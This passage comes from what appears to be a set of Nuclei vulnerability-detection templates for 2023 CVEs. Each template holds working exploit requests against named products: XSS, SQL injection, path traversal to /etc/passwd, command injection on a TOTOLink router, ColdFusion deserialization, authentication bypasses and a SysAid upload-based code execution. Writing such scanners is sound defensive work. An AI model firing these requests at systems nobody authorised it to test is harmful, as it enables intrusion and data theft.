{{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/json\n\n{\n  \"title\":\"Kernsicherheitstest\",\n  \"body\":\"Kernsicherheitstest\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains((body), 'https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=REDACTED')"]},{"type":"word","words":["Caused by:","TTS request failed"],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-44353","info":{"name":"Adobe ColdFusion WDDX Deserialization Gadgets","severity":"critical"},"requests":[{"raw":["POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_known_path}}</string></var></struct></data></wddxPacket>\n","POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_bad_path}}</string></var></struct></data></wddxPacket>\n","POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_known_path}}</string></var></struct></data></wddxPacket>\n","POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_bad_path}}</string></var></struct></data></wddxPacket>\n"],"matchers-condition":"or","matchers":[{"type":"dsl","name":"windows","dsl":["status_code_1 == 500 && status_code_2 == 404","contains(body_1, \"coldfusion.runtime\")"],"condition":"and"},{"type":"dsl","name":"linux","dsl":["status_code_3 == 500 && status_code_4 == 404","contains(body_3, \"coldfusion.runtime\")"],"condition":"and"}]}]},{"id":"CVE-2023-3845","info":{"name":"MooDating 1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/friends/ajax_invitej7hrg%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ef26v4?mode=model"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"><img src=a onerror=alert(document.domain)>\", \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-29439","info":{"name":"FooGallery plugin <= 2.2.35 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/post-new.php?post_type=foogallery&post=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["data-gallery_id=\"\\\"><script>alert(document.domain)</script>\"","foogallery-image-edit-modal"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6038","info":{"name":"H2O ImportFiles - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /3/ImportFiles?path=%2Fetc%2Fpasswd HTTP/1.1\nHost: {{Hostname}}\n","POST /3/ParseSetup HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsource_frames=%5B%22nfs%3A%2F%2Fetc%2Fpasswd%22%5D\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'ImportFilesV3')","regex('root:.*:0:0:', body_2)","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-4568","info":{"name":"PaperCut NG Unauthenticated XMLRPC Functionality","severity":"medium"},"requests":[{"raw":["POST /rpc/clients/xmlrpc HTTP/1.1\nHost: {{Hostname}}\nContent-Type:text/xml\n\n<?xml version=\"1.0\"?><methodCall><methodName>client.getGlobalConfig</methodName><params><param><value><string>str1</string></value></param><param><value><string>str2</string></value></param></params></methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["conf.ssl-port","conf.auth-ttl-default"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29922","info":{"name":"PowerJob V4.3.1 - Authentication Bypass","severity":"medium"},"requests":[{"raw":["POST /user/save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"username\":\"{{str}}\",\"phone\":\"{{str}}\",\"email\":\"{{str}}\",\"webHook\":\"{{str}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"data\":null"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27639","info":{"name":"PrestaShop TshirteCommerce - Directory Traversal","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/tshirtecommerce/ajax.php?type=svg"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"url=.%2F..%2Fvendor%2Fjdorn%2Fsql-formatter%2Fexamples&file_name=examples.php","matchers-condition":"and","matchers":[{"type":"word","words":["SqlFormatter Examples","SqlFormatter","<?php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-41266","info":{"name":"Qlik Sense Enterprise - Path Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/resources/qmc/fonts/../../../qrs/ReloadTask?xrfkey=1333333333333337&filter=.ttf"],"headers":{"Cookie":"X-Qlik-Session=13333333-3333-3333-3333-333333333337","X-Qlik-Xrfkey":"1333333333333337"},"matchers":[{"type":"dsl","dsl":["status_code == 400","contains(to_lower(set_cookie), 'x-qlik-session')","contains(body, 'The comparison expression does not consist of three elements')"],"condition":"and"}]}]},{"id":"CVE-2023-1454","info":{"name":"Jeecg-boot 3.5.0 qurestSql - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /jeecg-boot/jmreport/qurestSql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"apiSelectId\":\"1316997232402231298\",\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SQLException","XPATH syntax error:"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["XPATH syntax error: '([a-z_@%]+)'","XPATH syntax error: '([a-z- @%]+)'","XPATH syntax error: '([a-z@%0-9.]+)'"],"part":"body"}]}]},{"id":"CVE-2023-22463","info":{"name":"KubePi JwtSigKey - Admin Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /kubepi/api/v1/users HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\n\n{\n  \"authenticate\": {\n       \"password\": \"{{password}}\"\n  },\n  \"email\": \"{{email}}\",\n  \"isAdmin\": true,\n  \"mfa\": {\n          \"enable\": false\n   },\n  \"name\": \"{{name}}\",\n  \"nickName\": \"{{nickname}}\",\n  \"roles\": [\n  ]\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"password\":","\"isAdmin\":","\"createAt\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2224","info":{"name":"Seo By 10Web < 1.2.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wdseo_sitemap HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=wdseo_sitemap&id_message=2 HTTP/1.1\nHost: {{Hostname}}\n\ntask=save&wd_settings%5Bsitemap%5D=1&wd_settings%5Bbing_verification%5D=&wd_settings%5Byandex_verification%5D=&wd_settings%5Bnotify_google%5D=0&wd_settings%5Bnotify_bing%5D=0&wd_settings%5Badditional_pages%5D%5B%5D=&wd_settings%5Badditional_pages%5D%5Bpage_url%5D%5B%5D=%22%3E%3Caudio+src%3Dx+onerror%3Dconfirm%28document.domain%29%3E&wd_settings%5Badditional_pages%5D%5Bpriority%5D%5B%5D=0&wd_settings%5Badditional_pages%5D%5Bfrequency%5D%5B%5D=always&wd_settings%5Badditional_pages%5D%5Blast_changed%5D%5B%5D=&wd_settings%5Bexclude_post_types%5D%5B%5D=&wd_settings%5Bexclude_taxonomies%5D%5B%5D=&wd_settings%5Bexclude_archives%5D%5B%5D=&wd_settings%5Bexclude_posts%5D=&wd_settings%5Bsitemap_image%5D=0&wd_settings%5Bsitemap_video%5D=0&wd_settings%5Bsitemap_stylesheet%5D=1&wd_settings%5Blimit%5D=1000&wd_settings%5Bautoupdate_sitemap%5D=0&nonce_wdseo={{nonce}}&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwdseo_sitemap%26id_message%3D1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["value=\"\"><audio src=x onerror=confirm(document.domain)>\""]},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","part":"header_3","status":[200]}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["name=\"nonce_wdseo\" value=\"([a-z0-9]+)\" \\/>"],"internal":true}]}]},{"id":"CVE-2023-6567","info":{"name":"LearnPress <= 4.2.5.7 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 20s\nGET /wp-json/lp/v1/courses/archive-course?&order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains_all(header, \"lp_session_guest=\", \"application/json\")","contains_all(body, \"status\\\":\\\"success\", \"No courses were found\")"],"condition":"and"}]}]},{"id":"CVE-2023-30013","info":{"name":"TOTOLink - Unauthenticated Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/cstecgi.cgi HTTP/1.1\nHost: {{Hostname}}\n\n{\"command\":\"127.0.0.1; ls>../{{randstr}};#\",\"num\":\"230\",\"topicurl\":\"setTracerouteCfg\"}\n","GET /{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["lan_ip","reserv"],"condition":"and"},{"type":"word","part":"body_2","words":[".sh",".cgi"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-43374","info":{"name":"Hoteldruid v3.0.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /hoteldruid/inizio.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","part":"body","words":["HotelDruid</a>"],"internal":true}]},{"raw":["@timeout: 20s\nPOST /hoteldruid/personalizza.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naggiorna_qualcosa=SI&anno=2023&attiva_phpr_log=Enable&id_sessione=1&id_utente_log=0'%2b(SELECT%207151%20FROM%20(SELECT(SLEEP(5)))EAXh)%2b'&id_utente_mod=1\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(body, \"HotelDruid:\")"],"condition":"and"}]}]},{"id":"CVE-2023-6023","info":{"name":"VertaAI ModelDB - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/artifact/getArtifact?artifact_path=../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/octet-stream","filename="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-47246","info":{"name":"SysAid Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /userentry?accountId=/../../../tomcat/webapps/{{directory}}/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{ hex_decode('789c0bf06666e16200819c8abcf02241510f4e201b84851864189cc35c758d0c8c8c754dcc8d4cccf44a2a4a42433819981fdb05a79e63f34b2dade0666064f9cac8c0c0023201a83a3ec43538842bc09b91498e1997b1126071a026862d8d506d1896b0422c41b320c09b950da2979121024887824d02000d3f1fcb') }}\n","@timeout: 15\nGET /{{directory}}/CVE-2023-47246.txt?{{wait_for(9)}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2,'CVE_TEST') && status_code_1==200 && status_code_2==200"]}]}]},{"id":"CVE-2023-2982","info":{"name":"Miniorange Social Login and Register <= 7.6.3 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption=moopenid&email=uzmpvjPBmwEO3tFXq0vlJg%3D%3D&appName=rlHeqZw2vrPzOiWWfCParA%3D%3D\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"set_cookie","words":["wordpress_sec_","wordpress_logged_in_"],"condition":"or"},{"type":"status","status":[302]}]}]},{"id":"CVE-2023-47643","info":{"name":"SuiteCRM Unauthenticated Graphql Introspection","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /api/graphql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nX-XSRF-TOKEN: {{csrftoken}}\n\n{\"query\":\"query IntrospectionQuery {\\r\\n      __schema {\\r\\n        \\r\\n        queryType { name }\\r\\n        mutationType { name }\\r\\n        subscriptionType { name }\\r\\n        types {\\r\\n          ...FullType\\r\\n        }\\r\\n        directives {\\r\\n          name\\r\\n          description\\r\\n          \\r\\n          locations\\r\\n          args {\\r\\n            ...InputValue\\r\\n          }\\r\\n        }\\r\\n      }\\r\\n    }\\r\\n\\r\\n    fragment FullType on __Type {\\r\\n      kind\\r\\n      name\\r\\n      description\\r\\n      \\r\\n      fields(includeDeprecated: true) {\\r\\n        name\\r\\n        description\\r\\n        args {\\r\\n          ...InputValue\\r\\n        }\\r\\n        type {\\r\\n          ...TypeRef\\r\\n        }\\r\\n        isDeprecated\\r\\n        deprecationReason\\r\\n      }\\r\\n      inputFields {\\r\\n        ...InputValue\\r\\n      }\\r\\n      interfaces {\\r\\n        ...TypeRef\\r\\n      }\\r\\n      enumValues(includeDeprecated: true) {\\r\\n        name\\r\\n        description\\r\\n        isDeprecated\\r\\n        deprecationReason\\r\\n      }\\r\\n      possibleTypes {\\r\\n        ...TypeRef\\r\\n      }\\r\\n    }\\r\\n\\r\\n    fragment InputValue on __InputValue {\\r\\n      name\\r\\n      description\\r\\n      type { ...TypeRef }\\r\\n      defaultValue\\r\\n      \\r\\n      \\r\\n    }\\r\\n\\r\\n    fragment TypeRef on __Type {\\r\\n      kind\\r\\n      name\\r\\n      ofType {\\r\\n        kind\\r\\n        name\\r\\n        ofType {\\r\\n          kind\\r\\n          name\\r\\n          ofType {\\r\\n            kind\\r\\n            name\\r\\n            ofType {\\r\\n              kind\\r\\n              name\\r\\n              ofType {\\r\\n                kind\\r\\n                name\\r\\n                ofType {\\r\\n                  kind\\r\\n                  name\\r\\n                  ofType {\\r\\n                    kind\\r\\n                    name\\r\\n                  }\\r\\n                }\\r\\n              }\\r\\n            }\\r\\n          }\\r\\n        }\\r\\n      }\\r\\n    }\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["userHash","authenticateId","systemGeneratedPassword"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrftoken","group":1,"part":"header","regex":["XSRF-TOKEN=([^;]+)"],"internal":true}]}]},{"id":"CVE-2023-5375","info":{"name":"Mosparo < 1.0.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/project/switch/1?targetPath=http://oast.pro"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro.*$"]}]}]},{"id":"CVE-2023-36144","info":{"name":"Intelbras Switch - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/exportCfgwithpasswd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["System Description","System Version","System Name"],"condition":"and"},{"type":"word","part":"header","words":["attachment;filename="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39700","info":{"name":"IceWarp Mail Server v10.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /webmail/?color=%22%3E%3Cimg%20src=x%20onerror=confirm(document.cookie)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"><img src=x onerror=confirm(document.cookie)>\") && contains(body, \"IceWarp\")"],"condition":"and"}]}]},{"id":"CVE-2023-38203","info":{"name":"Adobe ColdFusion - Deserialization of Untrusted Data","severity":"critical"},"requests":[{"raw":["POST /CFIDE/adminapi/base.cfc?method= HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version%3d'1.0'><header/><data><struct+type%3d'xcom.sun.rowset.JdbcRowSetImplx'><var+name%3d'dataSourceName'><string>{{jndi}}</string></var><var+name%3d'autoCommit'><boolean+value%3d'true'/></var></struct></data></wddxPacket>\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(body, \"ColdFusion documentation\")"],"condition":"and"}]}]},{"id":"CVE-2023-1317","info":{"name":"osTicket < v1.16.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /scp/login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(tolower(body), \"osticket\")"],"internal":true}],"extractors":[{"type":"regex","name":"csrftoken","part":"body","group":1,"regex":["__CSRFToken__\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1\n","GET /scp/ajax.php/orgs/search?q=osTicket%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"<img src=a onerror=alert(document.domain)>\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-22893","info":{"name":"Strapi Versions <=4.5.6 - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /api/auth/cognito/callback?access_token={{to_lower(rand_text_alpha(8))}}&id_token=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.{{base64(payload)}}. HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"provider\":","\"confirmed\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"json","part":"body","name":"token","json":[".jwt"]}]}]},{"id":"CVE-2023-2825","info":{"name":"GitLab 16.0.0 - Path Traversal","severity":"high"},"requests":[{"raw":["GET /users/sign_in HTTP/1.1\nHost: {{Hostname}}\n","POST /users/sign_in HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept: */*\n\nuser%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&authenticity_token={{token_1}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept: */*\n\ngroup%5Bparent_id%5D=&group%5Bname%5D={{data}}-1&group%5Bpath%5D={{data}}-1&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-2&group%5Bpath%5D={{data}}-2&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-3&group%5Bpath%5D={{data}}-3&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-4&group%5Bpath%5D={{data}}-4&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-5&group%5Bpath%5D={{data}}-5&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-6&group%5Bpath%5D={{data}}-6&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-7&group%5Bpath%5D={{data}}-7&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-8&group%5Bpath%5D={{data}}-8&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-9&group%5Bpath%5D={{data}}-9&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-10&group%5Bpath%5D={{data}}-10&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-11&group%5Bpath%5D={{data}}-11&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","@timeout: 15s\nPOST /projects HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nproject%5Bci_cd_only%5D=false&project%5Bname%5D=CVE-2023-2825&project%5Bselected_namespace_id%5D={{namespace_id}}&project%5Bnamespace_id%5D={{namespace_id}}&project%5Bpath%5D=CVE-2023-2825&project%5Bvisibility_level%5D=20&project%5Binitialize_with_readme=1&authenticity_token={{token_2}}\n","POST /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nX-CSRF-Token: {{x-csrf-token}}\nContent-Type: multipart/form-data; boundary=0ce2a9fbe06b6da89c138a35a1765ed6\n\n--0ce2a9fbe06b6da89c138a35a1765ed6\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}\"\n\n{{randstr}}\n--0ce2a9fbe06b6da89c138a35a1765ed6--\n","GET /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads/{{upload-hash}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","words":["726f6f743a78"],"encoding":"hex"},{"type":"word","part":"header","words":["application/octet-stream","etc%2Fpasswd"],"condition":"and"}],"extractors":[{"type":"regex","name":"token_1","group":1,"regex":["name=\"authenticity_token\" value=\"([A-Za-z0-9_-]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"token_2","group":1,"regex":["name=\"csrf\\-token\" content=\"([A-Z_0-9a-z-]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"parent_id","group":1,"regex":["href=\"\\/groups\\/new\\?parent_id=([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"namespace_id","group":1,"regex":["ref=\"\\/projects\\/new\\?namespace_id=([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"x-csrf-token","group":1,"regex":["const headers = \\{\"X\\-CSRF\\-Token\":\"([a-zA-Z-0-9_]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"upload-hash","group":1,"regex":["\"url\":\"\\/uploads\\/([0-9a-z]+)\\/"],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-6977","info":{"name":"Mlflow <2.8.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\",\"source\":\"//proc/self/root\"}\n","GET /model-versions/get-artifact?name={{randstr}}&path=etc%2Fpasswd&version=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"word","part":"header_3","words":["filename=passwd","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6553","info":{"name":"Worpress Backup Migration <= 1.3.7 - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/backup-backup/readme.txt"],"matchers":[{"type":"dsl","internal":true,"dsl":["status_code == 200","contains(body, \"Backup Migration\")"],"condition":"and"}]},{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/backup-backup/includes/backup-heart.php"],"headers":{"Content-Dir":"{{rand_text_alpha(10)}}"},"matchers":[{"type":"dsl","dsl":["len(body) == 0","status_code == 200","!contains(body, \"Incorrect parameters\")"],"condition":"and"}]}]},{"id":"CVE-2023-50720","info":{"name":"XWiki < 4.10.15 - Email Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/view/Main/Search?sort=score&sortOrder=desc&highlight=true&facet=true&r=1&f_locale=en&f_locale=&text=objcontent%3Aemail*","{{BaseURL}}/xwiki/bin/view/Main/Search?sort=score&sortOrder=desc&highlight=true&facet=true&r=1&f_locale=en&f_locale=&text=objcontent%3Aemail*"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["email</span> :","XWiki.XWikiUsers[0]","email_checked</span>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0514","info":{"name":"Membership Database <= 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=member-database%2Flist_members.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=sort&where=id&operator=%3D&value=asd%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%2F%2F&sortBy=id&ascdesc=asc\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"Member Database\")"],"condition":"and"}]}]},{"id":"CVE-2023-50968","info":{"name":"Apache OFBiz < 18.12.11 - Server Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /partymgr/control/{{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{parameter}}={\"http://{{interactsh-url}}/api\":\"{{str}}\"}\n"],"payloads":{"path":["getJSONuiLabel","getJSONuiLabelArray"],"parameter":["requiredLabel","requiredLabels"]},"attack":"clusterbomb","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["OFBiz.Visitor="]}]}]},{"id":"CVE-2023-2356","info":{"name":"Mlflow <2.3.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST 